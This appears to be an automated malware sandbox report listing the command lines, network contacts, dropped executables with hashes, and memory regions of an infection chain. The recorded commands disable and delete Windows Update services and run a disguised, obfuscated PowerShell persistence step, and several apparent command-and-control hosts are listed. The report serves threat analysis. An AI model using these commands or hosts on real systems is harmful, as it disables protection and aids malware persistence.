C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

"C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe"

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

"C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe"

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 potunulit.org udp
US 188.114.97.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
KR 211.168.53.110:80 colisumy.com tcp
US 8.8.8.8:53 110.53.168.211.in-addr.arpa udp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 139.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 nordskills.eu udp
PS 213.6.54.58:443 nordskills.eu tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
KR 211.168.53.110:80 colisumy.com tcp
FR 178.32.90.250:29608 tcp
FR 178.32.90.250:29608 tcp
US 8.8.8.8:53 250.90.32.178.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 files.catbox.moe udp
NL 162.0.217.254:443 api.2ip.ua tcp
CA 108.181.20.35:443 files.catbox.moe tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.20.181.108.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
KR 211.168.53.110:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
KR 220.82.134.215:80 zexeq.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 211.168.53.110:80 colisumy.com tcp
US 8.8.8.8:53 215.134.82.220.in-addr.arpa udp
KR 220.82.134.215:80 zexeq.com tcp
KR 220.82.134.215:80 zexeq.com tcp
US 8.8.8.8:53 greenbi.net udp
AR 190.139.250.133:80 greenbi.net tcp
US 8.8.8.8:53 0.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.250.139.190.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp

Files

memory/2016-134-0x0000000002560000-0x0000000002660000-memory.dmp

memory/2016-135-0x0000000000400000-0x000000000246F000-memory.dmp

memory/2016-136-0x00000000041B0000-0x00000000041B9000-memory.dmp

memory/3164-137-0x0000000002AD0000-0x0000000002AE6000-memory.dmp

memory/2016-138-0x0000000000400000-0x000000000246F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\Temp\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\Temp\D6D9.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/632-151-0x0000000004110000-0x00000000041AD000-memory.dmp

memory/632-152-0x00000000041B0000-0x00000000042CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/4376-155-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4376-157-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D822.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

C:\Users\Admin\AppData\Local\Temp\D6D9.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/3344-162-0x0000000002510000-0x0000000002644000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D822.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4376-163-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4280-165-0x0000000000BE0000-0x0000000000BE6000-memory.dmp

memory/3344-167-0x00000000007E0000-0x00000000007E6000-memory.dmp

memory/3344-168-0x0000000002510000-0x0000000002644000-memory.dmp

memory/4280-164-0x0000000000400000-0x0000000000534000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D822.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

C:\Users\Admin\AppData\Local\Temp\DA46.exe

MD5 5f47cf94bc36498d877b0eb8383beb80
SHA1 37da5d8fa2c3e3280cb7104ef256fd80f2b5f577
SHA256 4dc37dde750140c501153394ec13f4dfbb61c958ce149ec9944d09a9967e8b63
SHA512 001cac104207778f300dafd1419b5544073da7b56550679e2ba9c2720144b2a4b7f3bc3f7be080e568532116ad4b71da044704409e12b87e37a422025d2d4b6b

C:\Users\Admin\AppData\Local\Temp\DA46.exe

MD5 5f47cf94bc36498d877b0eb8383beb80
SHA1 37da5d8fa2c3e3280cb7104ef256fd80f2b5f577
SHA256 4dc37dde750140c501153394ec13f4dfbb61c958ce149ec9944d09a9967e8b63
SHA512 001cac104207778f300dafd1419b5544073da7b56550679e2ba9c2720144b2a4b7f3bc3f7be080e568532116ad4b71da044704409e12b87e37a422025d2d4b6b

memory/4376-153-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DC99.exe

MD5 5f47cf94bc36498d877b0eb8383beb80
SHA1 37da5d8fa2c3e3280cb7104ef256fd80f2b5f577
SHA256 4dc37dde750140c501153394ec13f4dfbb61c958ce149ec9944d09a9967e8b63
SHA512 001cac104207778f300dafd1419b5544073da7b56550679e2ba9c2720144b2a4b7f3bc3f7be080e568532116ad4b71da044704409e12b87e37a422025d2d4b6b

C:\Users\Admin\AppData\Local\Temp\DC99.exe

MD5 5f47cf94bc36498d877b0eb8383beb80
SHA1 37da5d8fa2c3e3280cb7104ef256fd80f2b5f577
SHA256 4dc37dde750140c501153394ec13f4dfbb61c958ce149ec9944d09a9967e8b63
SHA512 001cac104207778f300dafd1419b5544073da7b56550679e2ba9c2720144b2a4b7f3bc3f7be080e568532116ad4b71da044704409e12b87e37a422025d2d4b6b

memory/1584-179-0x00000000024B0000-0x00000000025B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E15C.exe

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

memory/1584-182-0x00000000040A0000-0x00000000040DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E15C.exe

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

memory/1584-186-0x0000000006BC0000-0x0000000007164000-memory.dmp

memory/1584-190-0x0000000000400000-0x0000000002485000-memory.dmp

memory/2216-199-0x00000000001C0000-0x0000000000644000-memory.dmp

memory/1612-198-0x0000000006B80000-0x0000000006B92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E814.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

memory/1612-195-0x0000000000400000-0x0000000002485000-memory.dmp

memory/1584-203-0x00000000079A0000-0x00000000079DC000-memory.dmp

memory/1584-205-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/1612-194-0x00000000078F0000-0x00000000079FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E814.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

memory/1584-206-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/1584-210-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/3344-209-0x0000000002760000-0x000000000285B000-memory.dmp

memory/1584-196-0x0000000007270000-0x0000000007888000-memory.dmp

memory/1612-211-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/1612-212-0x0000000006C10000-0x0000000006C20000-memory.dmp

memory/2216-213-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/1584-214-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/4308-215-0x0000000000500000-0x0000000000509000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

memory/4308-217-0x0000000000400000-0x00000000004BB000-memory.dmp

memory/1584-223-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

memory/1612-229-0x0000000006C10000-0x0000000006C20000-memory.dmp

memory/4308-233-0x00000000005F0000-0x00000000006F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3344-239-0x0000000002860000-0x0000000002941000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3344-242-0x0000000002860000-0x0000000002941000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/3524-236-0x00007FF7DC220000-0x00007FF7DC2B7000-memory.dmp

memory/3344-234-0x0000000002860000-0x0000000002941000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/4280-232-0x0000000002830000-0x000000000292B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\F95B.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2216-255-0x0000000072D10000-0x00000000734C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F95B.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\Temp\F95B.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/3344-253-0x0000000002860000-0x0000000002941000-memory.dmp

memory/4280-261-0x0000000002930000-0x0000000002A11000-memory.dmp

memory/4280-263-0x0000000002930000-0x0000000002A11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FCE6.exe

MD5 ebdca76cfeb9e581215be8bcc75d013b
SHA1 71942561186341b9913d33e305403176f94f340f
SHA256 1d0458b67bfce2fa1e93b0f83d132abcac4475baf89f1f1d334b928cba901a51
SHA512 5acd5988a16bebf520a1f030f8cb12458d723bfb2da9e5f28cd97ecebc8cde0fbca92eb64edd2dbeaa39449b079230c669e7c455d91de182a32102e0bdc8239b

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

memory/1612-221-0x00000000025C0000-0x00000000026C0000-memory.dmp

memory/4280-271-0x0000000002930000-0x0000000002A11000-memory.dmp

memory/2264-279-0x0000000000090000-0x0000000000152000-memory.dmp

memory/4376-283-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3164-289-0x0000000002B00000-0x0000000002B16000-memory.dmp

memory/4308-291-0x0000000000400000-0x00000000004BB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/2264-285-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/2264-284-0x0000000004B20000-0x0000000004B30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

MD5 a760050a2d8c2dfa14fb2c6c36241247
SHA1 174c1705efea87bb0ac787cb7138d264dd1df8f0
SHA256 af005565b94b0e31eae0d38c61d0888ee81621e45a4c217557a9b2347ed07f00
SHA512 07b654c0bb77640934d495ca83cc5c1e5636d78e68d3680cc9f08355843874c3a1b8da1b2580d21ca80bf5fe8d9b36aa3d64ec67f60991a7ff2f1e2eb6e6e103

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

MD5 a760050a2d8c2dfa14fb2c6c36241247
SHA1 174c1705efea87bb0ac787cb7138d264dd1df8f0
SHA256 af005565b94b0e31eae0d38c61d0888ee81621e45a4c217557a9b2347ed07f00
SHA512 07b654c0bb77640934d495ca83cc5c1e5636d78e68d3680cc9f08355843874c3a1b8da1b2580d21ca80bf5fe8d9b36aa3d64ec67f60991a7ff2f1e2eb6e6e103

memory/2080-300-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4392-299-0x0000000004181000-0x0000000004212000-memory.dmp

memory/2080-301-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2080-298-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\b5911907-77a3-4c03-af46-51f331b5268b\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 1ebe29638ced3f7ce8f725b6b7ff46f8
SHA1 b4ebbbabed6499321a14b3c4a4a74adcce55135f
SHA256 d032207b8a1c95e10ebcab100057c875d1f389bdafe042b7a250eb1c5cfdfef1
SHA512 58362c445b1344418b72ed764a6cb5838acbc1a3fe44fa6d458741daa6ba0303f280ccda11fba9c2dba10f9013d939aedbab8ec6123e97ce22a243e1dc1f985e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 717a2295b16fbe992f9aedac199cee03
SHA1 d7e03baecb86b4c82bb827f6c9a63f37b8ca262f
SHA256 48cdbe7a323dc9615a623e27010e3ad84c0f7d2ce9f78fce84710319105d8eb4
SHA512 bf1db0a6c82212f9029cdcbe0ae057308f2c4703c3a946e73fbd837121caece58dcf9a4382f6f909b94014d81159918a274c543dac00ae2264860542f5cf6b23

memory/1584-307-0x0000000007C90000-0x0000000007D06000-memory.dmp

memory/1584-308-0x0000000007D10000-0x0000000007DA2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 c01fcb0db5aded4a825c1d7f97a35e1a
SHA1 5a75b3fbfd39566b06363f68a98ea146941f262d
SHA256 ada788b4cbd81874fb4feaac47fb8d0a31871fde641e9dcd45ee615204f21b46
SHA512 88e01d9238db41d9d6bdebe56f43a3c7167c3765e3d00945660ab9b3cb0277337271117ece43d491dfc86dc99afcb0caae80148d9143c95b55483b27c86a67f9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 4e11eb03da7ca054329b3e4302736a43
SHA1 46871bd354b770f6273c0b7d52c8919aa8c5f0ec
SHA256 697e224cfdc4619ab6cd0caed1187275ed10e5d3df8f71c84a4e12b6d22cde41
SHA512 e68243f89ff1c818217818294054f5cc347bcef95ccd329f38c301c52658f1e03d9b1f98d7f0bd4a68cb4e79508e777297a46ce737041eb6fb1ce92c3f12f95e

memory/1612-311-0x0000000007DB0000-0x0000000007E16000-memory.dmp

memory/4376-312-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/1584-315-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/3524-317-0x0000000002980000-0x0000000002AB1000-memory.dmp

memory/1584-318-0x00000000024B0000-0x00000000025B0000-memory.dmp

memory/3524-316-0x0000000002810000-0x0000000002980000-memory.dmp

memory/1584-325-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F95B.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/1612-327-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/1612-328-0x0000000006C10000-0x0000000006C20000-memory.dmp

memory/1612-330-0x0000000006C10000-0x0000000006C20000-memory.dmp

memory/1612-333-0x0000000006C10000-0x0000000006C20000-memory.dmp

memory/1584-335-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/1584-337-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/1612-339-0x00000000025C0000-0x00000000026C0000-memory.dmp

memory/1612-341-0x0000000006C10000-0x0000000006C20000-memory.dmp

memory/2452-342-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2452-340-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3760-344-0x00000000041B0000-0x0000000004247000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F95B.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/4940-347-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4940-348-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4940-350-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2452-336-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1536-334-0x0000000004180000-0x0000000004211000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2452-332-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1584-322-0x0000000072D10000-0x00000000734C0000-memory.dmp

memory/2080-321-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2264-352-0x0000000005B40000-0x0000000005C25000-memory.dmp

memory/2264-351-0x0000000005B40000-0x0000000005C25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F95B.exe

